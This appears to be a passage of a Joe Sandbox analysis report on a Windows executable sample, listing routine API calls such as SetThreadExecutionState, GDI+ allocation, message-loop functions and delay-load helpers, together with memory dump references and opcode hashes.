                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: a9c395db7e02c7406cb1be75a10d3b3b2d381739664aab79c0159c87fbdd0adf
                  • Instruction ID: b582e17ee25270c5ba7d9e1aa4d0d630e5b18644857be7e31db5b61eebbec357
                  • Opcode Fuzzy Hash: a9c395db7e02c7406cb1be75a10d3b3b2d381739664aab79c0159c87fbdd0adf
                  • Instruction Fuzzy Hash: AFF0B431008780AACF221B784808BC67FA0BF55321F14CA09F5FD12192C27414859773
                  APIs
                  • SetThreadExecutionState.KERNEL32(00000001), ref: 005A06B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ExecutionStateThread
                  • String ID:
                  • API String ID: 2211380416-0
                  • Opcode ID: 87ced4a651687965789f7e5572178fb85805405fbf97fe522b0f6415d3cab4da
                  • Instruction ID: dae65a64eec3a26b657cf7ee7608c12d65aa2bab1b883123d731d91b809c1c44
                  • Opcode Fuzzy Hash: 87ced4a651687965789f7e5572178fb85805405fbf97fe522b0f6415d3cab4da
                  • Instruction Fuzzy Hash: 72D02B2521111229CF313728E84D7FF1E0B7FC3721F081023B00D172C78B4A088E52E2
                  APIs
                  • GdipAlloc.GDIPLUS(00000010), ref: 005A9D81
                    • Part of subcall function 005A9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 005A9B30
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Gdip$AllocBitmapCreateFromStream
                  • String ID:
                  • API String ID: 1915507550-0
                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction ID: 5972c7d55ed47854d2a8ebec4f2d52b9164be7f5574531805b0141e2cacfddf5
                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction Fuzzy Hash: B1D0A73021821E7ADF40BA708C03A7E7FA8FB42300F004025BC0986141ED71DE50A271
                  APIs
                  • GetFileType.KERNELBASE(000000FF,00599887), ref: 00599995
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: 8bd509b9dd47360fcbace9e54ff5f0b9d466c0bb0551899dd09ea0d0b39ad31f
                  • Instruction ID: 7a49ef855e8f45352cef01ea1d5abe8986494d910ad981992be8e8011662fecd
                  • Opcode Fuzzy Hash: 8bd509b9dd47360fcbace9e54ff5f0b9d466c0bb0551899dd09ea0d0b39ad31f
                  • Instruction Fuzzy Hash: D2D01232012541958F65963C4D094997F51EB83366B78D6ACD025C40A1D723C803F542
                  APIs
                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 005AD43F
                    • Part of subcall function 005AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AAC85
                    • Part of subcall function 005AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AAC96
                    • Part of subcall function 005AAC74: IsDialogMessageW.USER32(00010406,?), ref: 005AACAA
                    • Part of subcall function 005AAC74: TranslateMessage.USER32(?), ref: 005AACB8
                    • Part of subcall function 005AAC74: DispatchMessageW.USER32(?), ref: 005AACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                  • String ID:
                  • API String ID: 897784432-0
                  • Opcode ID: 0e276c546898bd722a739fb5e79e5ae3b95d9d99946d0b8780a33bbd76e43e67
                  • Instruction ID: 16e1ee5591ac6d5c123364ad2d74565d91ed476d007acfc2a19a33a803d03dfd
                  • Opcode Fuzzy Hash: 0e276c546898bd722a739fb5e79e5ae3b95d9d99946d0b8780a33bbd76e43e67
                  • Instruction Fuzzy Hash: 51D09E71144301ABDA122B51CE06F1F7EA6BB98B04F404555B344B40B186669D34EB16
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6dc1dcefd8fa1efd3425b758f626dc903a20d63a0131a13dad2c01fc6cc37113
                  • Instruction ID: e81a20f40bcfcceb031614723e2b686261d81f1e24f458d03a1a056ce30c2004
                  • Opcode Fuzzy Hash: 6dc1dcefd8fa1efd3425b758f626dc903a20d63a0131a13dad2c01fc6cc37113
                  • Instruction Fuzzy Hash: F8B092A12690026C31087144684AE3A0A68E4C3B11720881AB50BD2480D44458044431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 152777396ecf3cda3530e843e21c946c1cf54a5f360350559473848d37f9c3fc
                  • Instruction ID: 88868156bad3984e142fe9928e77567bea287f1c3ae0ceb82c16a92c888e9925
                  • Opcode Fuzzy Hash: 152777396ecf3cda3530e843e21c946c1cf54a5f360350559473848d37f9c3fc
                  • Instruction Fuzzy Hash: 0CB092912680026D31087144694BE3A0A68E4C2B11720881EB10BD2580D544580A4431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 210588d2da918062fd5bc4f22c9d487e03989a6ab71a5b6bba211122813c8e60
                  • Instruction ID: 1a959bb9634a28f57d787e64297314ef4c09fe4dfc24ea9229ac269582793942
                  • Opcode Fuzzy Hash: 210588d2da918062fd5bc4f22c9d487e03989a6ab71a5b6bba211122813c8e60
                  • Instruction Fuzzy Hash: BBB012D126C1036C314871446C4BF3F0F7CF4C2B11730891EB10BD25C0D5445C894431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9e4704a0ee59e7f75b526fbea19cb44569ec999d1abe6bd59b98bd66f6f303c9
                  • Instruction ID: 182857201c061ed27f22dd91be001ade3d7fe8ec23b03d2d7810b839a38ebad6
                  • Opcode Fuzzy Hash: 9e4704a0ee59e7f75b526fbea19cb44569ec999d1abe6bd59b98bd66f6f303c9
                  • Instruction Fuzzy Hash: 25B092A12680026C31087145684AE3A0A68F4C2B11720481AB10BD2480D44458044431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5fe2af56692e5fd07efb695d5c40db89b25258ff3ef6ec16502a826c8f87b8df
                  • Instruction ID: 1fc440d779c7198f265c361b2d0b80a56ff2bc266eef55262ab2c03b21cb4d7a
                  • Opcode Fuzzy Hash: 5fe2af56692e5fd07efb695d5c40db89b25258ff3ef6ec16502a826c8f87b8df
                  • Instruction Fuzzy Hash: 6AB092A12680026D31087144694AE3A0A68E4C2B11720481AB10BD2480D44459054431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d0b3f3046baac18d7691236bd3be19f02505c754afb7412cd7670d675407f862
                  • Instruction ID: 9b1eb1069ea192c3129667b1a3f2b3b85ec7a1d156776805972f99886989387c
                  • Opcode Fuzzy Hash: d0b3f3046baac18d7691236bd3be19f02505c754afb7412cd7670d675407f862
                  • Instruction Fuzzy Hash: 74B092A12681026C314871446C4AE3A0A68E4C2B11720491AB10BD2480D44458444431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 69ee40c512c40b4cbae8b4630e9c8f93a63e115ff169a20b09f9679347e64315
                  • Instruction ID: fefbf68355745b0c702c4844910485958b9ef1f819946f51b9f92157d6606abb
                  • Opcode Fuzzy Hash: 69ee40c512c40b4cbae8b4630e9c8f93a63e115ff169a20b09f9679347e64315
                  • Instruction Fuzzy Hash: C9B092952682026C31083140A89AE3F0E28E4C2B11720892AB10BA148094445C488431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 74e2b19f3b6bb25919a40ada6113aa1ede3ade696a6b36ed6ee54f2ad6bc9cbf
                  • Instruction ID: dd726ae7fd9b585263f4583b9cf9045a4eced83830f180f983561d9b5b57a4fc
                  • Opcode Fuzzy Hash: 74e2b19f3b6bb25919a40ada6113aa1ede3ade696a6b36ed6ee54f2ad6bc9cbf
                  • Instruction Fuzzy Hash: 50B092922690026C31087144684BE3A0A68E4C2B11720881EB50BD2580D54458094431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0eff3c6bc8be6a85cfbe7c6fb95a458198620b7573ddab280ae8701acafd026a
                  • Instruction ID: e841715479b3e6bcc54841b2fb50e57af796d6c5d9061f5186ea1f06a52470e4
                  • Opcode Fuzzy Hash: 0eff3c6bc8be6a85cfbe7c6fb95a458198620b7573ddab280ae8701acafd026a
                  • Instruction Fuzzy Hash: 28B012D526C1076C31087144AC8BF3F0F7CF4C2B11730881EB10BD24C0D4445C044531
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0b491aaae88e7824ece5a1dc4ffd3581aff6e7e35cda85c89fe2561dfeede928
                  • Instruction ID: 87b842afd99842d434f6433768ec17d4978d47100adcefd5e2b859f9443da3ea
                  • Opcode Fuzzy Hash: 0b491aaae88e7824ece5a1dc4ffd3581aff6e7e35cda85c89fe2561dfeede928
                  • Instruction Fuzzy Hash: 3CB092A12680026D31087144694AE3A0AA8E4C2B11B20481AB10BD24C0D44458054831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 50fa5987e9208b5b653b1a69be1e4fda4540b7a742f9322c4b69427bff90ede2
                  • Instruction ID: 3f76db052cd0048aa244bb40dafe572c0ab9c934c7db607b18e4fbbd685ce0cc
                  • Opcode Fuzzy Hash: 50fa5987e9208b5b653b1a69be1e4fda4540b7a742f9322c4b69427bff90ede2
                  • Instruction Fuzzy Hash: DAB012E16AD1036C314872446C4BF3F0F7DF4C2B11B30491EB10BD24C0D4445C444431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: bf7b46e3ba6b7f12c8a6c59fad5486d8efba4f66c4aa192de7f2712b39f51edf
                  • Instruction ID: aae27f6909964a0830e126983318f0dc0e6416d5f7c73116156aacf0eb264f5a
                  • Opcode Fuzzy Hash: bf7b46e3ba6b7f12c8a6c59fad5486d8efba4f66c4aa192de7f2712b39f51edf
                  • Instruction Fuzzy Hash: 09B012D16AE0036C310871446C4BF3F0F7DF4C3B11B30881EB50BD24C0D4445C044431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
